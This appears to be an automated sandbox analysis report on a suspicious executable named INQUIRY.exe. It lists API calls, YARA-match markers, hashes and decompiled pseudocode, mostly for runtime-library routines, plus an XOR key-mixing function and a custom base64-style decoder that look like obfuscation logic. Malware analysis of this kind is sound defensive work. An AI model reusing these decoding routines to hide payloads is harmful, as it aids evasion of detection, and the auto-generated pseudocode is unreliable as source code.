                                                                          • Part of subcall function 0048A15C: Sleep.KERNEL32(000003E8,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A168
                                                                          • Part of subcall function 0048A15C: GetModuleHandleW.KERNEL32(?,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A171
                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0048B082
                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0048B092
                                                                        • __lock.LIBCMT ref: 0048B0B4
                                                                        • InterlockedIncrement.KERNEL32(004934D8), ref: 0048B0C1
                                                                        • __lock.LIBCMT ref: 0048B0D5
                                                                        • ___addlocaleref.LIBCMT ref: 0048B0F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                        • API String ID: 1028249917-2843748187
                                                                        • Opcode ID: f71737a39c52cd78a48e74ce37244a19c2382bd74f8a6e67bfcf91d1d0e296c6
                                                                        • Instruction ID: a9aaf04b4586c950861128c32e65cb89b2736f1ed5330593efd498b0f2e58603
                                                                        • Opcode Fuzzy Hash: f71737a39c52cd78a48e74ce37244a19c2382bd74f8a6e67bfcf91d1d0e296c6
                                                                        • Instruction Fuzzy Hash: 6511C370900702AEDB21AF76C801B9EBBE0AF01314F10892FE4A9937A1CB7C99418B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004660BE, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 45%
                                                                        			E004660BE(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v291;
				char _v292;
				char _v547;
				char _v548;
				char _v1058;
				char _v1060;
				char _v1570;
				char _v1572;
				char* _t81;
				char* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t97;
				intOrPtr* _t102;
				signed short* _t103;
				intOrPtr _t106;
				void* _t107;

				_t85 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				L004703F4();
				_v548 = 0;
				L004703F4();
				_v1572 = 0;
				L004703F4();
				_v1060 = 0;
				L004703F4();
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
				_v24 = 0xff;
				 *0x412018( &_v548,  &_v24);
				_t102 =  *0x4120d0; // 0x758dffff
				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_t81 =  &_v292;
				_push(_t81);
				L004703B6();
				_v32 = _t81;
				_t82 =  &_v548;
				_push(_t82);
				L004703B6();
				_t106 = _v36;
				_v28 = _t82;
				_push(0x10);
				_push( &_v20);
				_push(_t106);
				L0047043C();
				_t84 = 0xba0da71d;
				if(_v28 > 0) {
					_t103 =  &_v1060;
					do {
						_t97 = _a4 & 0x80000003;
						if(_t97 < 0) {
							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t89 = ( *_t103 & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
						_a4 = _a4 + 1;
						_t103 =  &(_t103[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t85) {
					do {
						_t92 = _a4 & 0x80000003;
						if(_t92 < 0) {
							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
						_t84 = _t84 * 0xbc8f;
						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}











































                                                                        0x004660cf
                                                                        0x004660da
                                                                        0x004660de
                                                                        0x004660e2
                                                                        0x004660e6
                                                                        0x004660ea
                                                                        0x004660ee
                                                                        0x004660f2
                                                                        0x004660f6
                                                                        0x004660fa
                                                                        0x004660fe
                                                                        0x00466102
                                                                        0x00466106
                                                                        0x0046610a
                                                                        0x0046610e
                                                                        0x00466112
                                                                        0x00466116
                                                                        0x0046611a
                                                                        0x00466120
                                                                        0x0046612e
                                                                        0x00466134
                                                                        0x00466147
                                                                        0x0046614e
                                                                        0x0046615c
                                                                        0x00466163
                                                                        0x0046616e
                                                                        0x0046617f
                                                                        0x00466182
                                                                        0x00466185
                                                                        0x00466196
                                                                        0x00466199
                                                                        0x0046619f
                                                                        0x004661b8
                                                                        0x004661cd
                                                                        0x004661cf
                                                                        0x004661d5
                                                                        0x004661d6
                                                                        0x004661db
                                                                        0x004661de
                                                                        0x004661e4
                                                                        0x004661e5
                                                                        0x004661ea
                                                                        0x004661ed
                                                                        0x004661f0
                                                                        0x004661f5
                                                                        0x004661f6
                                                                        0x004661f7
                                                                        0x00466202
                                                                        0x00466207
                                                                        0x00466209
                                                                        0x0046620f
                                                                        0x00466212
                                                                        0x00466218
                                                                        0x0046621e
                                                                        0x0046621e
                                                                        0x00466222
                                                                        0x00466225
                                                                        0x0046622e
                                                                        0x00466230
                                                                        0x00466237
                                                                        0x00466238
                                                                        0x0046620f
                                                                        0x00466240
                                                                        0x00466242
                                                                        0x00466245
                                                                        0x0046624b
                                                                        0x00466251
                                                                        0x00466251
                                                                        0x0046625a
                                                                        0x0046625d
                                                                        0x00466266
                                                                        0x00466268
                                                                        0x0046626b
                                                                        0x0046626c
                                                                        0x00466242
                                                                        0x00466275

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.735044023.0000000000400000.00000004.00000001.sdmp Download File
                                                                        • Associated: 00000001.00000002.735147214.0000000000482000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5$H$O$b$i$}$}
                                                                        • API String ID: 0-3760989150
                                                                        • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction ID: 085fb8e70ef0eada5a1d20243ecae5196f57fe3971bb647bf342fdf5a836fb3c
                                                                        • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction Fuzzy Hash: 0251DA7180025DEEDB11DBA8CC40EEEBBBCEF49314F0481EAE559E6191D3789B44CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004FB3A6, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5$H$O$b$i$}$}
                                                                        • API String ID: 0-3760989150
                                                                        • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction ID: f2bc64ad88cee6a9e767b0469ae0257665808a0ab5ce2db2a82fee9a74a0ec21
                                                                        • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction Fuzzy Hash: 5151E771C0065DAEDB11CBA4CC44AFEBBBCFF49314F0442A9E559E6182D3389B85CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048CF60, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0048CF6C
                                                                          • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                          • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                        • __amsg_exit.LIBCMT ref: 0048CF8C
                                                                        • __lock.LIBCMT ref: 0048CF9C
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0048CFB9
                                                                        • InterlockedIncrement.KERNEL32(021D2B88), ref: 0048CFE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 4271482742-0
                                                                        • Opcode ID: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                        • Instruction ID: f892595e6e8bc3b7f9317b1e981c58d7ef87b17b483e3ce9e4092376cc7d32d2
                                                                        • Opcode Fuzzy Hash: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                        • Instruction Fuzzy Hash: F101E131A01611ABEB11BF25884575E7B61AB01715F04482BEB00A77D0C73C6D41CBEE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048B577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 0048B595
                                                                          • Part of subcall function 00489445: __mtinitlocknum.LIBCMT ref: 0048945B
                                                                          • Part of subcall function 00489445: __amsg_exit.LIBCMT ref: 00489467
                                                                          • Part of subcall function 00489445: RtlEnterCriticalSection.NTDLL(?), ref: 0048946F
                                                                        • ___sbh_find_block.LIBCMT ref: 0048B5A0
                                                                        • ___sbh_free_block.LIBCMT ref: 0048B5AF
                                                                        • HeapFree.KERNEL32(00000000,?,004926D0,0000000C,00489426,00000000,00492600,0000000C,00489460,?,?,?,0048D525,00000004,004927D0,0000000C), ref: 0048B5DF
                                                                        • GetLastError.KERNEL32(?,0048D525,00000004,004927D0,0000000C,0048B660,?,?,00000000,00000000,00000000,?,0048B14E,00000001,00000214), ref: 0048B5F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 2714421763-0
                                                                        • Opcode ID: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                        • Instruction ID: 80bad2d6a6bfc3f9f804d1c8ca66343406cc332f6b57d3fdcfd0cf5f46b783a0
                                                                        • Opcode Fuzzy Hash: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                        • Instruction Fuzzy Hash: B601F731902705BEDF307F729C0A76E7A64DF00768F24492FF500A6690CB3C89818B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004F8170, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $/A$,/A$0/A$X7A$`7A
                                                                        • API String ID: 0-851144607
                                                                        • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                        • Instruction ID: 4428056738c1ec361f974de153bb2c1ca2297caa9b4de1d09cfaf12758fc748c
                                                                        • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                        • Instruction Fuzzy Hash: 094182B0655642EFC3098F2AC5846C1FFE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004F8309, Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $/A$,/A$0/A$4/A$`7A
                                                                        • API String ID: 0-2435369464
                                                                        • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                        • Instruction ID: 0a08b35f92fb99a00e0bf9f6e867f43e276e1d31ddc6d6f82e1f0a13e65aa554
                                                                        • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                        • Instruction Fuzzy Hash: 6A01F6B4000B498AC721EF61C1846D6BBF0FB45309F51C80FE0A98A204CFF8A19ACF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0048CCC4, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0048CCD0
                                                                          • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                          • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                        • __getptd.LIBCMT ref: 0048CCE7
                                                                        • __amsg_exit.LIBCMT ref: 0048CCF5
                                                                        • __lock.LIBCMT ref: 0048CD05
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 3521780317-0
                                                                        • Opcode ID: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                        • Instruction ID: fdb5c6d65f8cd6ed5de720e99c888756382875035551d096808b3d9f95a16156
                                                                        • Opcode Fuzzy Hash: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                        • Instruction Fuzzy Hash: 95F09632A007009FD721FB76844675E77E0AB41715F144D6FE544AB291CB7C5D019BAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0046FCFC, Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E0046FCFC(void* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t36;
				void* _t55;
				signed char _t56;
				char* _t66;
				void* _t67;
				void* _t68;

				_t67 = __edi;
				_t55 = __eax;
				_push(__eax);
				_t68 = 0;
				L004703B6();
				_t36 = __eax + 0xfffffffd;
				_v16 = _t36;
				if(_t36 < 0) {
					L18:
					 *((char*)(_t68 + _t67)) = 0;
					return _t68;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - __eax;
				_t5 = _t55 + 2; // 0x46fe76
				_t66 = _t5;
				while(1) {
					_t6 = _t66 - 2; // 0x75fff88b
					_t38 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E0046FCC8(_t38);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t66 - 1; // 0xfc75fff8
					_t40 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E0046FCC8(_t40);
					} else {
						_v5 = 0x3e;
					}
					_t42 =  *_t66;
					if( *_t66 != 0x2e) {
						_t56 = E0046FCC8(_t42);
					} else {
						_t56 = 0x3e;
					}
					_t44 =  *((intOrPtr*)(_t66 + 1));
					if( *((intOrPtr*)(_t66 + 1)) != 0x2e) {
						_v7 = E0046FCC8(_t44);
					} else {
						_v7 = 0x3e;
					}
					 *(_t67 + _t68) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t66 == 0x2d) {
						break;
					}
					 *(_t68 + _t67 + 1) = _t56 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t66 + 1)) == 0x2d) {
						 *((char*)(_t68 + _t67 + 2)) = 0;
						_t34 = _t68 + 2; // 0x2
						return _t34;
					}
					_t68 = _t68 + 3;
					 *(_t68 + _t67 - 1) = _t56 << 0x00000006 | _v7;
					_t25 = _t68 + 5; // 0x2
					_t66 = _t66 + 4;
					if(_t25 >= 0x3ff || _v12 + _t66 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t68 + _t67 + 1) = 0;
				_t31 = _t68 + 1; // 0x1
				return _t31;
			}














                                                                        0x0046fcfc
                                                                        0x0046fd04
                                                                        0x0046fd06
                                                                        0x0046fd07
                                                                        0x0046fd09
                                                                        0x0046fd0e
                                                                        0x0046fd12
                                                                        0x0046fd15
                                                                        0x0046fdcd
                                                                        0x0046fdcd
                                                                        0x00000000
                                                                        0x0046fdd1
                                                                        0x0046fd1b
                                                                        0x0046fd22
                                                                        0x0046fd25
                                                                        0x0046fd25
                                                                        0x0046fd28
                                                                        0x0046fd28
                                                                        0x0046fd28
                                                                        0x0046fd2d
                                                                        0x0046fd3a
                                                                        0x0046fd2f
                                                                        0x0046fd2f
                                                                        0x0046fd2f
                                                                        0x0046fd3d
                                                                        0x0046fd3d
                                                                        0x0046fd42
                                                                        0x0046fd4f
                                                                        0x0046fd44
                                                                        0x0046fd44
                                                                        0x0046fd44
                                                                        0x0046fd52
                                                                        0x0046fd56
                                                                        0x0046fd61
                                                                        0x0046fd58
                                                                        0x0046fd58
                                                                        0x0046fd58
                                                                        0x0046fd63
                                                                        0x0046fd68
                                                                        0x0046fd75
                                                                        0x0046fd6a
                                                                        0x0046fd6a
                                                                        0x0046fd6a
                                                                        0x0046fd86
                                                                        0x0046fd8c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046fd9b
                                                                        0x0046fda3
                                                                        0x0046fde1
                                                                        0x0046fde6
                                                                        0x00000000
                                                                        0x0046fde6
                                                                        0x0046fdab
                                                                        0x0046fdae
                                                                        0x0046fdb2
                                                                        0x0046fdb5
                                                                        0x0046fdbd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046fdbd
                                                                        0x0046fdd7
                                                                        0x0046fddc
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.735044023.0000000000400000.00000004.00000001.sdmp Download File
                                                                        • Associated: 00000001.00000002.735147214.0000000000482000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >$>$>$s&F
                                                                        • API String ID: 0-573601131
                                                                        • Opcode ID: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                        • Instruction ID: 2eac1ac47f149cc7f756bd3d5d00c452ac80f5de0da29780c2b8aa333607b310
                                                                        • Opcode Fuzzy Hash: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                        • Instruction Fuzzy Hash: 9831B25180D6C99ED7118A6890467EFFFA54F22308F1886ABC0D657383E26C754E879B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: INQUIRY.exe PID: 5788 Parent PID: 2016 INQUIRY.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00405CA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00405CA0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405da5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AE8( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405DAC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401338();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401340();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401338();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401338();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401338();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                        0x00405ca1
                                                                        0x00405ca3
                                                                        0x00405cab
                                                                        0x00405cbc
                                                                        0x00405cc1
                                                                        0x00405cda
                                                                        0x00405ce1
                                                                        0x00405d23
                                                                        0x00405d25
                                                                        0x00405d26
                                                                        0x00405d2b
                                                                        0x00405d2e
                                                                        0x00405d31
                                                                        0x00405d43
                                                                        0x00405d66
                                                                        0x00405d86
                                                                        0x00405d86
                                                                        0x00405d8a
                                                                        0x00405d90
                                                                        0x00405d93
                                                                        0x00405d96
                                                                        0x00405da4
                                                                        0x00405ce3
                                                                        0x00405cf8
                                                                        0x00405cff
                                                                        0x00000000
                                                                        0x00405d01
                                                                        0x00405d16
                                                                        0x00405d1d
                                                                        0x00405dac
                                                                        0x00405db4
                                                                        0x00405dbb
                                                                        0x00405dbc
                                                                        0x00405dcf
                                                                        0x00405dd4
                                                                        0x00405ddd
                                                                        0x00405df3
                                                                        0x00405df9
                                                                        0x00405dfa
                                                                        0x00405e07
                                                                        0x00405e0c
                                                                        0x00405e0b
                                                                        0x00405e0b
                                                                        0x00405e1b
                                                                        0x00405e23
                                                                        0x00405e29
                                                                        0x00405e2e
                                                                        0x00405e3b
                                                                        0x00405e3f
                                                                        0x00405e40
                                                                        0x00405e41
                                                                        0x00405e56
                                                                        0x00405e56
                                                                        0x00405e5a
                                                                        0x00405e73
                                                                        0x00405e77
                                                                        0x00405e78
                                                                        0x00405e79
                                                                        0x00405e89
                                                                        0x00405e8e
                                                                        0x00405e92
                                                                        0x00405e94
                                                                        0x00405ea9
                                                                        0x00405ead
                                                                        0x00405eae
                                                                        0x00405eaf
                                                                        0x00405ebf
                                                                        0x00405ec4
                                                                        0x00405ec4
                                                                        0x00405e92
                                                                        0x00405e5a
                                                                        0x00405e23
                                                                        0x00405ecd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405d1d
                                                                        0x00405cff

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                        • RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                        • RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
